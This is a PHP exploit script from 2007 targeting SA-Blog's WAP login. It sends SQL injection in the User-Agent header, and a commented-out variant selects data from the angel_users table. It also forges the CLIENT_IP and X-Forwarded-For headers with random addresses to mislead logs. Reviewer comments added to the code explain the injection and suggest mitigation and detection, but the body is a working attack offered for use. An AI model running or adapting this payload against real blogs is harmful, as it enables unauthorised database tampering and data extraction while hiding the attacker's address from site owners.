SA-Blog Exp
来源:loveshell.net 作者:vfocus 发布时间:2007-09-17  
<?php
//from    loveshell.net
// Command-line driver. Positional arguments: blog base URL, account name,
// account password. The request goes to the WAP login handler under /wap/.
//
// Reviewer context: the form fields posted here are an ordinary login. The
// hostile input is not in them; it is the User-Agent header hard-coded in
// myrequest(), which is sent along with this login request.
$url      = $argv[1] . '/wap/index.php';
$username = $argv[2];
$password = $argv[3];

$rule = "    +----------------------------------------------------------------+";

// The usage banner is printed unconditionally, before the arguments are checked.
echo $rule;
echo "        Uage:    php.exe    blogurl    username    password";
echo "        example    php.exe    http://www.loveshell.net/blog    test    test";
echo $rule;

// Stop silently when either credential is missing or falsy.
if (!$username || !$password) {
    exit;
}

echo "    root@localhost:Post    our    content";

// Login form body; the two values are concatenated as given, without URL-encoding.
$loginBody = 'username=' . $username . '&password=' . $password . '&action=login&do=login&';

$reply = myrequest($loginBody, $url);
echo $reply;

// Success is judged only by the literal "login successful" text in the reply.
echo (strpos($reply, '登陆成功') !== false)
    ? "    root@localhost:All    Done!!!    "
    : "    root@localhost:Login    error!!!    ";
echo $rule;
echo "    Enjoy    yourself.";
echo $rule;


// Hand-rolled HTTP client: opens a raw TCP socket to the host/port that
// initurl() extracts from $url, writes a request line and header strings to
// it, and returns everything read back from the socket.
//
// $msg    - request body; written only in the POST branch, where its byte
//           length is also what the Content-Length header string reports.
// $url    - target URL, split into host/port/path/query by initurl().
// $type   - 1 selects the GET variant, any other value (default 2) the POST one.
// $cookie - value placed in the Cookie header string (empty by default).
//
// Review notes (defender's view):
//  * The POST branch sends a User-Agent that is not a browser string. It opens
//    with a single quote, closes a parenthesised value list and starts another.
//    That shape only makes sense against a server that copies the User-Agent
//    header into an SQL INSERT ... VALUES statement without escaping it.
//    Presumably that is what the targeted SA-Blog WAP login does; the server
//    code is not shown on this page, so confirm against the application source.
//  * CLIENT_IP and X_FORWARDED-FOR are filled with a random dotted quad on
//    every call, so an application or log pipeline that trusts those headers
//    records a made-up client address.
//  * Mitigation: bind every request header value as a query parameter (or
//    escape it) before it reaches SQL, and take the client address from the
//    socket peer rather than from client-supplied headers.
//  * Detection: web or application logs showing a User-Agent that starts with
//    a quote character or contains "),(" match this request.
function    myrequest($msg,$url,$type=2,$cookie=''){
//change    type    for    post/get
    // $sql is declared global but never read or written in this function.
    global    $sql;
$urls    =    initurl($url);
// Random value for the two client-address headers below; it has no relation
// to the address the connection really comes from.
$iprand    =    rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255);
// '@' hides connection warnings; the last argument is a 3-second connect
// timeout. If the connection fails, $fp is false and both the request and the
// read loop below are skipped.
$fp    =    @fsockopen($urls['host'],    $urls['port'],    $errno,    $errstr,    3);
    if($fp)    {
        if($type==1){
        // GET variant: fixed, browser-like User-Agent; no body is written.
        fputs($fp,    "GET    $urls[path]?$urls[query]    HTTP/1.1");
        fputs($fp,    "Host:    $urls[host]");
        fputs($fp,    "Accept:    */*");
        fputs($fp,    "Referer:    $urls[url]");
        fputs($fp,    "User-Agent:    Mozilla/4.0    (compatible;    MSIE    5.00;    Windows    98)");
        fputs($fp,    "CLIENT_IP:    $iprand");
        fputs($fp,    "X_FORWARDED-FOR:    $iprand");
        fputs($fp,    "Pragma:    no-cache");
        fputs($fp,    "Cache-Control:    no-cache");
        fputs($fp,    "Connection:    Keep-Alive");
        fputs($fp,    "Cookie:    $cookie");
        }else{
        // POST variant: the form body in $msg is ordinary; the User-Agent
        // header is the part that carries SQL syntax.
        fputs($fp,    "POST    $urls[path]?$urls[query]    HTTP/1.1");
        fputs($fp,    "Accept:    application/x-shockwave-flash,    image/gif,    image/x-xbitmap,    image/jpeg,    image/pjpeg,    */*");
        fputs($fp,    "Referer:    $urls[url]");
        fputs($fp,    "Accept-Language:    zh-cn");
        fputs($fp,    "Content-Type:    application/x-www-form-urlencoded");
        // Disabled alternative kept by the author: the same header shape, but
        // with a subquery against a table named angel_users in place of a
        // literal value.
//        fputs($fp,    "User-Agent:    ',1),((select    concat(0x2f,groupid,0x2f,logincount)    from    angel_users    limit    1),1,1,'211.43.206.208','123");
        // Active value: fixed literals only. Which table or row they end up in
        // is not shown on this page.
        fputs($fp,    "User-Agent:    ',1),('9c5b71e5',1,1,'211.43.206.202','9989581653");
        fputs($fp,    "CLIENT_IP:    $iprand");
        fputs($fp,    "X_FORWARDED-FOR:    $iprand");
        fputs($fp,    "Host:    $urls[host]");
        fputs($fp,    "Content-Length:    ".strlen($msg)."");
        fputs($fp,    "Connection:    Keep-Alive");
        fputs($fp,    "Cache-Control:    no-cache");
        fputs($fp,    "Cookie:    $cookie");
        fputs($fp,    $msg."");
        }
    }


// Read in 1024-byte chunks until the peer signals end-of-file. $resp is never
// initialised, so the first append relies on PHP treating the undefined
// variable as empty; if the socket never opened, the undefined variable is
// what gets returned.
while($fp&&!feof($fp))    {
$resp    .=    fread($fp,1024);
}
return    $resp;
}


// Splits a URL into its components with parse_url() and rebuilds a normalised
// copy of it.
//
// Returns array('url' => '') when the input is shorter than 10 bytes, cannot
// be parsed, has no scheme, or uses the "file" scheme. Otherwise returns the
// parse_url() array with two additions: 'port' (the string '80' when the URL
// names no port) and 'url' (the reassembled URL string).
function initurl($url)
{
    $rejected = array('url' => '');

    if (strlen($url) < 10) {
        return $rejected;
    }

    // '@' keeps parse_url() quiet on malformed input; failure is detected below.
    $parts = @parse_url($url);
    if (empty($parts) || !is_array($parts)) {
        return $rejected;
    }
    if (empty($parts['scheme']) || $parts['scheme'] == 'file') {
        return $rejected;
    }

    // An '@' separator is emitted before the host if either credential part exists.
    $hasCredentials = !empty($parts['user']) || !empty($parts['pass']);

    $pieces = array($parts['scheme'] . '://');
    if (!empty($parts['user'])) {
        $pieces[] = $parts['user'];
    }
    if (!empty($parts['pass'])) {
        $pieces[] = ':' . $parts['pass'];
    }
    if (!empty($parts['host'])) {
        $pieces[] = ($hasCredentials ? '@' : '') . $parts['host'];
    }
    if (!empty($parts['port'])) {
        $pieces[] = ':' . $parts['port'];
    }
    if (!empty($parts['path'])) {
        $pieces[] = $parts['path'];
    }
    if (!empty($parts['query'])) {
        $pieces[] = '?' . $parts['query'];
    }
    if (!empty($parts['fragment'])) {
        $pieces[] = '#' . $parts['fragment'];
    }

    // The default port is applied only after the URL string has been assembled,
    // so an implicit port never appears in 'url'.
    $parts['port'] = empty($parts['port']) ? '80' : $parts['port'];
    $parts['url']  = implode('', $pieces);

    return $parts;
}
?>

 